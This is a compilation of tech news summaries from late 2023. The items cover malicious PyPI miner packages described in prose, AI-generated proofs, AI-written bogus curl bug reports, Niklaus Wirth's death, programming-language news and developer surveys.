An anonymous reader shared this report from The Hacker News: Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices.

The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down...

The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process continues to run even after exiting the session. "Echoing the approach of the earlier 'culturestreak' package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL," said Fortinet FortiGuard Labs researcher Gabby Xiong. "The payload is then incrementally released in various stages to execute its malicious activities."

The University of Massachusetts Amherst has an announcement. A team of computer scientists "recently announced a new method for automatically generating whole proofs that can be used to prevent software bugs and verify that the underlying code is correct." It leverages the AI power of Large Language Models, and the new method, called Baldur, "yields unprecedented efficacy of nearly 66%."

The idea behind the machine-checking technique was "to generate a mathematical proof showing that the code does what it is expected to do," according to the announcement, "and then use a theorem prover to make sure that the proof is also correct. But manually writing these proofs is incredibly time-consuming and requires extensive expertise. "These proofs can be many times longer than the software code itself," says Emily First, the paper's lead author who completed this research as part of her doctoral dissertation at UMass Amherst... First, whose team performed its work at Google, used Minerva, an LLM trained on a large corpus of natural-language text, and then fine-tuned it on 118GB of mathematical scientific papers and webpages containing mathematical expressions. Next, she further fine-tuned the LLM on a language, called Isabelle/HOL, in which the mathematical proofs are written. Baldur then generated an entire proof and worked in tandem with the theorem prover to check its work. When the theorem prover caught an error, it fed the proof, as well as information about the error, back into the LLM, so that it can learn from its mistake and generate a new and hopefully error-free proof.

This process yields a remarkable increase in accuracy. The state-of-the-art tool for automatically generating proofs is called Thor, which can generate proofs 57% of the time. When Baldur (Thor's brother, according to Norse mythology) is paired with Thor, the two can generate proofs 65.7% of the time. Though there is still a large degree of error, Baldur is by far the most effective and efficient way yet devised to verify software correctness, and as the capabilities of AI are increasingly extended and refined, so should Baldur's effectiveness grow.

In addition to First and Brun, the team includes Markus Rabe, who was employed by Google at the time, and Talia Ringer, an assistant professor at the University of Illinois — Urbana Champaign. This work was performed at Google and supported by the Defense Advanced Research Projects Agency and the National Science Foundation.

Generative AI models like Google Bard and GitHub Copilot are increasingly being used in various industries, but users often overlook their limitations, leading to serious errors and inefficiencies. Daniel Stenberg of curl and libcurl highlights a specific problem of AI-generated security reports: when reports are made to look better and to appear to have a point, it takes a longer time to research and eventually discard it. "Every security report has to have a human spend time to look at it and assess what it means," adds Stenberg. "The better the crap, the longer time and the more energy we have to spend on the report until we close it." The Register reports: The curl project offers a bug bounty to security researchers who find and report legitimate vulnerabilities. According to Stenberg, the program has paid out over $70,000 in rewards to date. Of 415 vulnerability reports received, 64 have been confirmed as security flaws and 77 have been deemed informative -- bugs without obvious security implications. So about 66 percent of the reports have been invalid. The issue for Stenberg is that these reports still need to be investigated and that takes developer time. And while those submitting bug reports have begun using AI tools to accelerate the process of finding supposed bugs and writing up reports, those reviewing bug reports still rely on human review. The result of this asymmetry is more plausible-sounding reports, because chatbot models can produce detailed, readable text without regard to accuracy.

As Stenberg puts it, AI produces better crap. "A crap report does not help the project at all. It instead takes away developer time and energy from something productive. Partly because security work is considered one of the most important areas so it tends to trump almost everything else." As examples, he cites two reports submitted to HackerOne, a vulnerability reporting community. One claimed to describe Curl CVE-2023-38545 prior to actual disclosure. But Stenberg had to post to the forum to make clear that the bug report was bogus. He said that the report, produced with the help of Google Bard, "reeks of typical AI style hallucinations: it mixes and matches facts and details from old security issues, creating and making up something new that has no connection with reality." [...]

Stenberg readily acknowledges that AI assistance can be genuinely helpful. But he argues that having a human in the loop makes the use and outcome of AI tools much better. Even so, he expects the ease and utility of these tools, coupled with the financial incentive of bug bounties, will lead to more shoddy LLM-generated security reports, to the detriment of those on the receiving end.

New submitter axlash writes: It has been reported on X that Niklaus Wirth, inventor and co-inventor of several languages including Pascal, Euler and Oberon, died on Jan 1, 2024. He was aged 89. "We lost a titan of programming languages, programming methodology, software engineering and hardware design," writes software engineer Bertrand Meyer in a post on X. "Niklaus Wirth passed away on the first of January. We mourn a pioneer, colleague, mentor and friend."

Niklaus Wirth, born on February 15, 1934, in Switzerland, is a renowned computer scientist known for his significant contributions to the field of computer science and software engineering. He is best known for developing several programming languages, including ALGOL W, Pascal, and Modula-2, which have had a profound impact on the design and development of modern computer software. Wirth's work emphasized simplicity, clarity, and efficiency in programming languages, which greatly influenced subsequent language design and the development of structured programming techniques. His legacy also includes the development of the Oberon programming language and the design of the Oberon operating system. Wirth's dedication to elegant and efficient software design continues to inspire computer scientists and software engineers worldwide, making him a highly respected figure in the history of computing.

You can learn more about Wirth via A.M. Turing Award, Britannica, and the Computer History Museum.

On December 15 GitHub declared end-of-life for its "hackable text editor" Atom. But Long-time Slashdot reader BrendaEM wants to remind everyone that after the announcement of Atom's sunset, "the community came together to keep Atom alive."

First there was the longstanding fork Atom-Community. But "due to differences in long-term goals for the editor, a new version was born: Pulsar."

From the Pulsar web site: Pulsar [sometimes referred to as Pulsar-Edit] aims to not only reach feature parity with the original Atom, but to bring Pulsar into the 21st century by updating the underlying architecture, and supporting modern features.

With many new features on the roadmap, once Pulsar is stable, it will be a true, Community-Based, Hackable, Text Editor.
"Of course, the user interface is much of the same," writes the blog Its FOSS, and it's cross-platform (supporting Linux, macOS, and Windows).

"The essentials seem to be there with the documentation, packages, and features like the ability to install packages from Git repositories..."

theodp writes: Back in May 2021, tech-backed nonprofit Code.org touted the signing of a licensing agreement with WhiteHat Jr., allowing the edtech company with a controversial past (Whitehat Jr. was bought for $300M in 2020 by Byju's, an edtech firm that received a $50M investment from Mark Zuckerberg's venture firm) to integrate Code.org's free-to-educators-and-organizations content and tools into their online tutoring service. Code.org did not reveal what it was charging Byju's to use its "free curriculum and open source technology" for commercial purposes, but Code.org's 2021 IRS 990 filing reported $1M in royalties from an unspecified source after earlier years reported $0. Coincidentally, Whitehat Jr. is represented by Aaron Kornblum, who once worked at Microsoft for now-President Brad Smith, who left Code.org's Board just before the lawsuit was filed.

Fast forward to 2023 and the bloom is off the rose, as Court records show that Code.org earlier this month sued Whitehat Education Technology, LLC (Exhibits A and B) in what is called "a civil action for breach of contract arising from Whitehat's failure to pay Code.org the agreed-upon charges for its use of Code.org's platform and licensed content and its ongoing, unauthorized use of that platform and content." According to the filing, "Whitehat agreed [in April 2022] to pay to Code.org licensing fees totaling $4,000,000 pursuant to a four-year schedule" and "made its first four scheduled payments, totaling $1,000,000," but "about a year after the Agreement was signed, Whitehat informed Code.org that it would be unable to make the remaining scheduled license payments." While the original agreement was amended to backload Whitehat's license fee payment obligations, "Whitehat has not paid anything at all beyond the $1,000,000 that it paid pursuant to the 2022 invoices before the Agreement was amended" and "has continued to access Code.org's platform and content."

That Byju's Whitehat Jr. stiffed Code.org is hardly shocking. In June 2023, Reuters reported that Byju's auditor Deloitte cut ties with the troubled Indian Edtech startup that was once an investor darling and valued at $22 billion, adding that a Byju's Board member representing the Chan-Zuckerberg Initiative had resigned with two other Board members. The BBC reported in July that Byju's was guilty of overexpanding during the pandemic (not unlike Zuck's Facebook). Ironically, the lawsuit Exhibits include screenshots showing Mark Zuckerberg teaching Code.org lessons. Zuckerberg and Facebook were once among the biggest backers of Code.org, although it's unclear whether that relationship soured after court documents were released that revealed Code.org's co-founders talking smack about Zuck and Facebook's business practices to lawyers for Six4Three, which was suing Facebook.

Code.org's curriculum is also used by the Amazon Future Engineer (AFE) initiative, but it is unclear what royalties -- if any -- Amazon pays to Code.org for the use of Code.org curriculum. While the AFE site boldly says, "we provide free computer science curriculum," the AFE fine print further explains that "our partners at Code.org and ProjectSTEM offer a wide array of introductory and advance curriculum options and teacher training." It's unclear what kind of organization Amazon's AFE ("Computer Science Learning Childhood to Career") exactly is -- an IRS Tax Exempt Organization Search failed to find any hits for "Amazon Future Engineer" -- making it hard to guess whether Code.org might consider AFE's use of Code.org software 'commercial use.' Would providing a California school district with free K-12 CS curriculum that Amazon boasts of cultivating into its "vocal champion" count as "commercial use"? How about providing free K-12 CS curriculum to children who live where Amazon is seeking incentives? Or if Amazon CEO Jeff Bezos testifies Amazon "funds computer science coursework" for schools as he attempts to counter a Congressional antitrust inquiry? These seem to be some of the kinds of distinctions Richard Stallman anticipated more than a decade ago as he argued against a restriction against commercial use of otherwise free software.

Programmer and writer Jose Gilgado, writes about WordStar 4.0, a popular word processor from the early 80s that continues to work reliably well. Famously author George R.R. Martin used the application to write "A Song of Ice and Fire." "It does everything I want a word processing program to do and it doesn't do anything else. I don't want any help. I hate some of these modern systems where you type up a lowercase letter and it becomes a capital. I don't want a capital, if I'd wanted a capital, I would have typed the capital," R.R. Martin said earlier, as we previously covered.

Gilgado argues that WordStar 4.0 embodies the concept of finished software -- a software you can use forever with no unneeded changes. He adds: Sometimes, a software upgrade is a step backward: less usable, less stable, with new bugs. Even if it's genuinely better, there's the learning curve. You were efficient with the old version, but now your most used button is on the other side of the screen under a hidden menu. In a world where constant change is the norm, finished software provides a breath of fresh air. It's a reminder that reliability, consistency, and user satisfaction can coexist in the realm of software development. So the next time you find yourself yearning for the latest update, remember that sometimes, the best software is the one that doesn't change at all.

A Canadian cybersecurity firm has warned that as soon as 2025, quantum computers could make current encryption methods useless.

But now Slashdot reader christoban shares a "reality check" — an IEEE Spectrum takedown with the tagline "Hype is everywhere, skeptics say, and practical applications are still far away." The quantum computer revolution may be further off and more limited than many have been led to believe. That's the message coming from a small but vocal set of prominent skeptics in and around the emerging quantum computing industry... [T]here's growing pushback against what many see as unrealistic expectations for the technology. Meta's head of AI research Yann LeCun recently made headlines after pouring cold water on the prospect of quantum computers making a meaningful contribution in the near future.

Speaking at a media event celebrating the 10-year anniversary of Meta's Fundamental AI Research team he said the technology is "a fascinating scientific topic," but that he was less convinced of "the possibility of actually fabricating quantum computers that are actually useful." While LeCun is not an expert in quantum computing, leading figures in the field are also sounding a note of caution. Oskar Painter, head of quantum hardware for Amazon Web Services, says there is a "tremendous amount of hype" in the industry at the minute and "it can be difficult to filter the optimistic from the completely unrealistic."

A fundamental challenge for today's quantum computers is that they are very prone to errors. Some have suggested that these so-called "noisy intermediate-scale quantum" (NISQ) processors could still be put to useful work. But Painter says there's growing recognition that this is unlikely and quantum error-correction schemes will be key to achieving practical quantum computers. The leading proposal involves spreading information over many physical qubits to create "logical qubits" that are more robust, but this could require as many as 1,000 physical qubits for each logical one. Some have suggested that quantum error correction could even be fundamentally impossible, though that is not a mainstream view. Either way, realizing these schemes at the scale and speeds required remains a distant goal, Painter says... "I would estimate at least a decade out," he says.
A Microsoft technical fellow believes there's fewer applications where quantum computers can really provide a meaningful advantage, since operating a qubit its magnitudes slower than simply flipping a transistor, which also makes the throughput rate for data thousands or even millions of times slowers.

"We found out over the last 10 years that many things that people have proposed don't work," he says. "And then we found some very simple reasons for that."

"It's like visiting an old friend for the holidays," according to this article: Approaching his 86th birthday, Donald Knuth — Stanford's beloved computer science guru — honored what's become a long-standing tradition. He gave a December "Christmas lecture" that's also streamed online for all of his fans...

More than 60 years ago, back in 1962, a 24-year-old Donald Knuth first started writing The Art of Computer Programming — a comprehensive analysis of algorithms which, here in 2023, he's still trying to finish. And 30 years ago Knuth also began making rare live appearances each December in front of audiences of Stanford students...

Recently Stanford uploaded several decades of Knuth's past Christmas lectures, along with a series of 22 videos of Knuth from 1985 titled "the 'Aha' Sessions'" (courses in mathematical problem-solving). There are also two different sets of five videos from 1981 showing Knuth introducing his newly-created typesetting system TeX. There are even 12 videos from 1982 of what Knuth calls "an intensive course about the internal details."

And on Dec. 6, wearing his traditional brown holiday sweater, Knuth gave yet another live demonstration of the beautifully clear precision that's made him famous.

It's a geek tradition that started online back in 2000. Programming language "advent calendars" offer daily tips about a programming language (if not a Christmas-themed programming puzzle) -- one a day through December 25th.

And 2023 finds a wide variety of fun sites to choose from:

• For example, there's 24 coding challenges at the Advent of JavaScript site (where "each challenge includes all the HTML and CSS you need to get started, allowing you to focus on the JavaScript.") And there's another 24 coding challenges on a related site... Advent of CSS.

• The cyber security training platform "TryHackMe.com" even coded up a site they call "Advent of Cyber," daring puzzle-solvers to "kickstart your cyber security career by engaging in a new, beginner-friendly exercise every day leading up to Christmas!"

• The programming puzzles at Advent of Code are continuing through the 25th (though so far less than 30,000 people have solved both parts of Saturday's challenge.)

• Every year since 2000 there's also been a new edition of the Perl Advent Calendar, and this month Year 23 started off with goodies from Perl's massive module repository, CPAN. (Specifically its elf-themed story references the Music::MelodicDevice::Ornamentation module) -- along with the MIDI::Util library and TiMidity++, a software synthesizer that can play MIDI files without a hardware synthesizer.)

• Meanwhile, since 2009 there's also been an advent calendar for Raku (the programming language formerly known as Perl 6), promising an article a day. (Day One's entry was titled "Rocking Raku Meets Stodgy Debian...")

• James Bennett, from the Django project's core team, is even attempting a Python/Django Advent calendar.

• There's also a JVM advent calendar for the Java Virtual Machine, plus another advent calendar promising daily posts about C#.

• The HTMHell site — which bills itself as "a collection of bad practices in HTML, copied from real websites" — is celebrating the season with the "HTMHell Advent Calendar," promising daily articles on security, accessibility, UX, and performance.

He specified the JSON notation, and developed tools like JSLint and the minifier JSMin. His Wikipedia entry says he was also a senior JavaScript architect at PayPal — but he's probably better known for writing O'Reilly's book JavaScript: the Good Parts.

But Doug Crockford has a new challenge. O'Reilly's monthly tech newsletter says Crockford "has created a new programming language called Misty. It is designed to be used both by students and professional programmers."

The language's official site calls it "a dynamic, general-purpose, transitional, actor language. It has a gentle syntax that is intended to benefit students, as well as advanced features such as capability security and lambdas with lexical scoping..." The language is quite strict in its use of spaces and indentation. In most programming languages, code spacing and formatting are underspecified, which leads to many incompatible conventions of style, some promoting bug formation, and all promoting time-wasting arguments, incompatibilities, and hurt feelings. Misty instead allows only one convention which is strictly enforced. This liberates programmers to focus their attention on more important matters.

Indentation is in increments of 4 spaces. The McKeeman Form is extended by three special rules to make this possible:


indentation
The spaces required by the current nesting.

increase_indentation
Append four spaces to the indentation.

decrease_indentation
Remove four spaces from the indentation.


The indentation is the number of spaces required at the beginning of a line as determined by its nesting level.


indent
increase_indentation linebreak

outdent
decrease_indentation linebreak


The linebreak rule allows the insertion of a comment, ends the line, and checks the indentation of the next line. Multiple comments and blank lines may appear wherever a line can end.

Long-time Slashdot reader destinyland writes: It's a question that comes up all the time on Reddit. Etsy even created a special page for programmer-themed gift suggestions (showing more than 5,000 results). While CNET sticks to broader lists of "tech gifts" — and a separate list for "Star Wars gifts" — other sites around the web have been specifically honing in on programmer-specific suggestions. (Blue light-blocking glasses... A giant rubber duck... The world's strongest coffee... A printer that transfers digital images onto cheese...)

So while in years past Amazon has said they laughed at customer reviews for cans of uranium, this year Amazon has now added a special section that's entirely dedicated to Gifts for Computer Programmers, according to this funny rundown of 2023's "Gifts for Programmers" (that ends up recommending ChatGPT gift cards and backyard office sheds):
From the article: [Amazon's Gifts for Programmers section] shows over 3,000 results, with geek-friendly subcategories like "Glassware & Drinkware" and "Novelty Clothing"... For the coder in your life, Amazon offers everything from brain–teasing programming puzzles to computer–themed jigsaw puzzles. Of course, there's also a wide selection of obligatory funny t–shirts... But this year there's also tech-themed ties and motherboard-patterned socks...

Some programmers, though, might prefer a gift that's both fun and educational. And what's more entertaining than using your Python skills to program a toy robot dog...? But if you're shopping for someone who's more of a cat person, Petoi sells a kit for building a programmable (and open source) cat robot named "Nybble". The sophisticated Arduino-powered feline can be programmed with Python and C++ (as well as block-based coding)... [part of] the new community that's building around "OpenCat", the company's own quadruped robotic pet framework (open sourced on GitHub).

Government researchers in the U.S. are studying methods to help identify hackers based on the code they use to carry out cyberattacks. From a report: The Intelligence Advanced Research Projects Activity, the lead federal research agency for the intelligence community, plans to develop technologies that could speed up investigations for identifying perpetrators of cyberattacks. "The number of attacks is increasing far more than the number of forensic experts that are available to go after these attacks," said Kristopher Reese, who is managing the research program at IARPA and holds a doctorate in computer science and engineering. The lack of forensic resources means hackers who target small organizations or companies that don't fall under critical infrastructure sectors often escape identification, he said.

Tools that are developed as part of the planned 30-month research project won't replace human analysts, who are crucial for identifying social and political dynamics that might explain why a particular hacking group targeted a victim, Reese said. But using artificial intelligence to analyze code used in cyberattacks will make investigations more efficient, he said. IARPA is accepting pitches from researchers until next month and plans to begin research next summer. [...] There hasn't been enough research into how analyzing code can reveal a hacker's identity, Reese said. Behavioral traits evident in code can reveal specific countries where hackers might be from or even the university where they were trained, he said. Some companies also have style guides outlining how employees should program, which could leave traces that indicate a person worked there, he said.

Connor Jones reports via The Register: DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, Cisco Talos revealed today. The attacks form part of what's being called "Operation Blacksmith" and are attributed to a group tracked as Andariel, believed to be a sub-division of the Lazarus Group -- North Korea's state-sponsored offensive cyber unit. [...]

The researchers noted that DLang is an uncommon choice for writing malware, but a shift towards newer languages and frameworks is one that's been accelerating over the last few years -- in malware coding as in the larger programming world. Rust, however, has often shown itself to be the preferred choice out of what is a fairly broad selection of languages deemed to be memory-safe. AlphV/BlackCat was the first ransomware group to make such a shift last year, re-writing its payload in Rust to offer its affiliates a more reliable tool. A month later, the now-shuttered Hive group did the same thing, and many others followed after that. Other groups to snub Rust include China-based Sandman which was recently observed using Lua-based malware, believed to be part of a wider shift toward Lua development from Chinese attackers.

TechSpot remembers that Turbo Pascal "stands out as one of the first instances of an integrated development environment (IDE), providing a text-based interface through which developers could write their code, compile it, and finally link it with runtime libraries." The early IDE, written in Assembly, eschewed the use of floppies, instead building the code directly in RAM for an unprecedented performance boost.

The language demonstrated superior speed, greater convenience, and a more affordable price compared to its competition. Philippe Kahn, Borland's CEO who initially conceptualized turning the new language into an all-in-one product, decided to sell the software via mail orders for just $49.95, establishing a market presence for the then-newly founded company.
It was called "Turbo" because its use of RAM made it considerable faster, adds the Register: Anders Hejlsberg, who would later go on to join Microsoft as part of the C# project, is widely credited as creator of the language, with Borland boss Philippe Kahn identifying the need for the all-in-one tool...

Version 1 had limitations. Source code files, for example, were limited to 64 KB. It would only produce .COM executable files for DOS and CP/M — although other architectures and operating systems were supported. It would also run from a single floppy disk, saving users from endless swapping in a world where single drives were the norm and a hard disk seemed impossibly exotic — and expensive... However, it was with version 4, in 1987, that Turbo Pascal changed dramatically. For one, support for CP/M and CP/M-86 was dropped, and the compiler would generate .EXE executables under DOS, lifting the .COM restrictions...

For this writer, 1989's version 5.5 was peak Turbo Pascal. Object-oriented programming features turned up, including classes and inheritance, and a step-by-step debugger. Version 6 and 7 brought in inline assembly and support for the creation of Windows executables and DLLs respectively, but version 7 also marked the end of the line as far as Borland was concerned. Turbo Pascal for Windows would turn up, but was eventually superseded by Delphi.

However, the steamroller of tools such as Visual Basic 3 ensured that Borland never had the same success in Windows that it enjoyed under DOS. As for Turbo Pascal, several versions were eventually released by Borland as freeware including version 1 for DOS, 5.5, and 7.
I once took a computer programming course taught entirely in Pascal. (Functions, subroutines, and procedures...)

Any Slashdot readers have their own memories to share about Pascal?

"Every day, 3 trillion dollars worth of transactions are handled by a 64-year-old programming language that hardly anybody knows anymore," writes PC Magazine. But most school's don't teach the mainframe programming language COBOL any more, and "COBOL cowboys" are aging out of the workforce, with replacements in short supply.

"This is precisely the kind of problem that IBM thinks it can fix with AI." IBM's approach is fairly straightforward: Rather than relying exclusively on a limited pool of human programmers to solve the problem, it built a generative AI-powered code assistant (watsonx) that helps convert all that dusty old COBOL code to a more modern language, thereby saving coders countless hours of reprogramming. In extremely simplified terms, the process is similar to feeding an essay written in English into ChatGPT and asking it to translate certain paragraphs into Esperanto. It allows programmers to take a chunk of COBOL and enlist watsonx to transform it into Java.

But of course, it's not quite that simple in practice... After IBM and the customer have a thorough understanding of the application landscape, the data flow, and the existing dependencies, "we help them refactor their applications," says IBM's Vice President of Product Management, IT Automation, Keri Olson. "That is, breaking it down into smaller pieces, which the customer can selectively choose, at that point, to do the modernization from COBOL to Java." Skyla Loomis, IBM's Vice President of IBM Z Software adds, "But you have to remember that this is a developer assistant tool. It's AI assisted, but it still requires the developer. So yes, the developer is involved with the tooling and helping the customers select the services."

Once the partnership between man and machine is established, the AI steps in and says, 'Okay, I want to transform this portion of code. The developer may still need to perform some minor editing of the code that the AI provides, Loomis explains. "It might be 80 or 90 percent of what they need, but it still requires a couple of changes. It's a productivity enhancement — not a developer replacement type of activity."
The article quotes a skeptical Gartner Distinguished Vice President and Analyst, who notes that IBM "has no case studies, at this time, to validate its claims."

The Go team conducted a survey of Go Developers in August — and has just released the results. Among the findings: "90% of survey respondents saying they felt satisfied while working with Go during the prior year," while 6% said they were dissastified. Further, the number of people working with Go continues to increase; we see evidence of this from external research like Stack Overflow's Developer Survey (which found 14% of professional developers worked with Go during the past year, a roughly 15% year-over-year increase), as well as analytics for go.dev (which show an 8% rise in visitors year-over-year). Combining this growth with a high satisfaction score is evidence that Go continues to appeal to developers, and suggests that many developers who choose to learn the language feel good about their decision long afterwards...

As in prior years, the majority of survey respondents told us they work with Go on Linux (63%) and macOS (58%) systems... We do continue to see that newer members of the Go community are more likely to be working with Windows than more experienced Go developers. We interpret this as a signal that Windows-based development is important for onboarding new developers to the Go ecosystem, and is a topic our team hopes to focus on more in 2024...

While x86-compatible systems still account for the majority of development (89%), ARM64 is also now used by a majority of respondents (56%). This adoption appears to be partly driven by Apple Silicon; macOS developers are now more likely to say they develop for ARM64 than for x86-based architectures (76% vs. 71%). However, Apple hardware isn't the only factor driving ARM64 adoption: among respondents who don't develop on macOS at all, 29% still say they develop for ARM64.
The most-preferred code editors among the surveyed Go programmers were VS Code (44%), GoLand (31%), Vim/Neovim (16%), and Emacs (3%). 52% of the survey's respondents actually selected "very satisfied" for their feelings about Go — the highest possible rating.

Other interesting findings:

• " The top requests for improving toolchain warnings and errors were to make the messages more comprehensible and actionable; this sentiment was shared by developers of all experience levels, but was particularly strong among newer Go developers."

• "Three out of every four respondents work on Go software that also uses cloud services; this is evidence that developers see Go as a language for modern, cloud-based development."

• The experimental gonew tool (which offers predefined templates for instantiating new Go projects) "appears to solve critical problems for Go developers (especially developers new to Go) and does so in a way that matches their existing workflows for starting a new project. Based on these findings, we believe gonew can substantially reduce onboarding barriers for new Go developers and ease adoption of Go in organizations."

• And when it comes to AI, "Go developers said they are more interested in AI/ML tooling that improves the quality, reliability, and performance of code they write, rather than writing code for them."

AI coding assistants are here to stay -- but just how big a difference they make is still unclear. From a report: Thomas Dohmke, GitHub's CEO: "You've got a lot of tabs open, you're planning a vacation, maybe you're reading the news. At last you copy the text you need and go back to your code, but it's 20 minutes later and you lost the flow." The key idea behind Copilot and other programs like it, sometimes called code assistants, is to put the information that programmers need right next to the code they are writing.

The tool tracks the code and comments (descriptions or notes written in natural language) in the file that a programmer is working on, as well as other files that it links to or that have been edited in the same project, and sends all this text to the large language model behind Copilot as a prompt. (GitHub co-developed Copilot's model, called Codex, with OpenAI. It is a large language model fine-tuned on code.) Copilot then predicts what the programmer is trying to do and suggests code to do it. This round trip between code and Codex happens multiple times a second, the prompt updating as the programmer types. At any moment, the programmer can accept what Copilot suggests by hitting the tab key, or ignore it and carry on typing. The tab button seems to get hit a lot. A study of almost a million Copilot users published by GitHub and the consulting firm Keystone Strategy in June -- a year after the tool's general release -- found that programmers accepted on average around 30% of its suggestions, according to GitHub's user data.

[...] Copilot has changed the basic skills of coding. As with ChatGPT or image makers like Stable Diffusion, the tool's output is often not exactly what's wanted -- but it can be close. "Maybe it's correct, maybe it's not -- but it's a good start," says Arghavan Moradi Dakhel, a researcher at Polytechnique Montreal in Canada who studies the use of machine-learning tools in software development. Programming becomes prompting: rather than coming up with code from scratch, the work involves tweaking half-formed code and nudging a large language model to produce something more on point.

"Advent of Code" has begun. New programming puzzles will appear every day until Christmas at AdventOfCode.com — and the annual event (first started in 2015) has grown into a worldwide phenomenon. This year's first puzzle has been completed by over 150,000 programmers (with another 115,652 completing Day Two's puzzle). And 108,000 fans have also joined the Advent of Code subReddit.

Contest-related comments are popping up all around the web. Some participants are live streaming their puzzle-solving efforts on Twitch. Self-described computer nerd Gary Grady is tweeting cartoons about each day's puzzle. JetBrains is even giving away some prizes in their "Advent of Code with Kotlin" event. And JetBrains developer advocate Sebastian Aigner is also hosting daily livestreams about each puzzle.

It's hard to overstate how big this event has become. This year's event attracted 60 sponsors, including Kotlin (for the third consecutive year), as well as Spotify, Shopify, and Sony Interactive Entertainment (as well as JPMorgan Chase, Bank of America, and American Express). Individual donors can get a special badge next to their name, and there's also a shop selling coffee mugs and t-shirts. But at its core is real-world developer Eric Wastl (plus a team of loyal beta-testers) sharing his genuine fondness for computer programming. Wastl is also the creator of a satirical web page for the fast, lightweight, cross-platform framework Vanilla JS ("so popular that browsers have been automatically loading it for over a decade") and also curates a collection of "things in PHP which make me sad".

And you can find him on X sharing encouraging comments for this year's participants.

"Structured concurrency is a new way to use multithreading in Java," reports InfoWorld.

"It allows developers to think about work in logical groups while taking advantage of both traditional and virtual threads." Available in preview in Java 21, structured concurrency is a key aspect of Java's future, so now is a good time to start working with it... Java's thread model makes it a strong contender among concurrent languages, but multithreading has always been inherently tricky. Structured concurrency allows you to use multiple threads with structured programming syntax. In essence, it provides a way to write concurrent software using familiar program flows and constructs. This lets developers focus on the business at hand, instead of the orchestration of threading.

As the JEP for structured concurrency says, "If a task splits into concurrent subtasks then they all return to the same place, namely the task's code block." Virtual threads, now an official feature of Java, create the possibility of cheaply spawning threads to gain concurrent performance. Structured concurrency provides the simple syntax to do so. As a result, Java now has a unique and highly-optimized threading system that is also easy to understand...

Between virtual threads and structured concurrency, Java developers have a compelling new mechanism for breaking up almost any code into concurrent tasks without much overhead... Any time you encounter a bottleneck where many tasks are occurring, you can easily hand them all off to the virtual thread engine, which will find the best way to orchestrate them. The new thread model with structured concurrency also makes it easy to customize and fine-tune this behavior. It will be very interesting to see how developers use these new concurrency capabilities in our applications, frameworks, and servers going forward.
It involves a new class StructuredTaskScope located in the java.util.concurrent library. (InfoWorld points out that "you'll need to use --enable-preview and --source 21 or --source 22 to enable structured concurrency.")

Their reporter shared an example on GitHub, and there's more examples in the Java 21 documentation. "The structured concurrency documentation includes an example of collecting subtask results as they succeed or fail and then returning the results."

The Linux Foundation's own "Open Software Security foundation" has an associated project called Alpha-Omega funded by Microsoft, Google, and Amazon with a mission to catalyze sustainable security improvements to critical open source projects and ecosystems.

It was established nearly two years ago in February of 2022 — and this month announced plans to continue supporting the Rust Foundation Security Initiative: 2022 was also the first full year of operation for the Rust Foundation — an independent nonprofit dedicated to stewarding the Rust programming language and supporting its global community. Given the considerable growth and rising popularity of the Rust programming language in recent years, it has never been more critical to have a healthy and well-funded foundation in place to help ensure the safety and security of this important language.

When the Rust Foundation emerged, OpenSSF recognized a shared vision of global open source security baked into their organizational priorities from day one. These shared security values were the driving force behind Alpha-Omega's decision to grant $460k USD to the Rust Foundation in 2022. This funding helped underwrite their Security Initiative — a program dedicated to improving the state of security within the Rust programming language ecosystem and sowing security best practices within the Rust community. The Security Initiative began in earnest this past January and has now been in operation for a full year with many achievements to note and exciting plans in development.

While security is a clear priority of the Rust language itself and can be seen in its memory safety-critical features, the Rust Project cannot reasonably be expected to foster long term, sustainable security without proper support and funding. Indeed, there is still a pervasive attitude across technology that cybersecurity is being managed and prioritized by "someone else." The unfortunate impact of this attitude is that critical security work often falls on overburdened and under-resourced open source maintainers. By prioritizing the Security Initiative during their first full year in operation, the Rust Foundation has taken on the responsibility of overseeing — and supporting — security improvements within the Rust ecosystem while ensuring meaningful progress...

Alpha-Omega is excited to announce our second year of supporting the Rust Foundation Security Initiative. We believe that this funding will build on the good work and momentum established by the Rust Foundation in 2023. Through this partnership, we are helping relieve maintainer burdens while paving an important path towards a healthier and more secure future within the Rust ecosystem.
Meanwhile, this month the Rust Foundation announced that downloads from Rust's package repository crates.io have now reached 45 billion — and that the foundation is "committed to facilitating the healthy growth of Rust through funding and resources for the community and the Project.

"After conducting initial planning and research and getting approval from our board of directors, we are pleased to announce our intention to help fulfill this commitment by developing a Rust Foundation training and certification program." We continue to be supportive of anyone creating Rust training and education materials. In fact, we are proud to have provided funding to a few individuals involved in this work via our Community Grants Program. Our team is also aware that commercial Rust training courses already exist and that global training entities are already developing their own Rust-focused programs. Given the value of Rust in professional open source, this makes sense. However, we are eager to introduce a program that will allow us to direct profits back into the Rust ecosystem.

As a nonprofit organization, we sit in a unique position thanks to the tools, connections, insights, administrative support, and resources at our disposal — all of which will add value to course material aimed at professional development and adoption. We see our forthcoming program as one tool of many that can be used to verify skills for prospective employers, and for those employers to build out their professional teams of Rust expertise. We will remain supportive of existing training programs offered by Rust Foundation member companies and we'll look for ways to ensure this remains the case as program development progresses... There is no set launch date for the Rust Foundation training and certification program yet, but we plan to continue laying high-quality groundwork in Q4 of 2023 and the first half of 2024.

An anonymous reader quotes a report from Hackaday: The BBC has a long history of teaching the world about computers. The broadcaster's name was proudly displayed on the BBC Micro, and BBC Basic was the programming language developed especially for that computer. Now, BBC Basic is back and running on a whole mess of modern platforms. BBC Basic for SDL 2.0 will run on Windows, MacOS, x86 Linux, and even Raspberry Pi OS, Android, and iOS. Desktop versions of the programming environment feature a BASIC editor that has syntax coloring for ease of use, along with luxury features like search and replace that weren't always available at the dawn of the microcomputer era. Meanwhile, the smartphone versions feature a simplified interface designed to work better in a touchscreen environment.

It's weird to see, but BBC Basic can actually do some interesting stuff given the power of modern hardware. It can address up to 256 MB of memory, and work with far more advanced graphical assets than would ever have been possible on the original BBC Micro. If you honed your programming skills on that old metal, you might be impressed with what they can achieve with BBC Basic in a new, more powerful context.

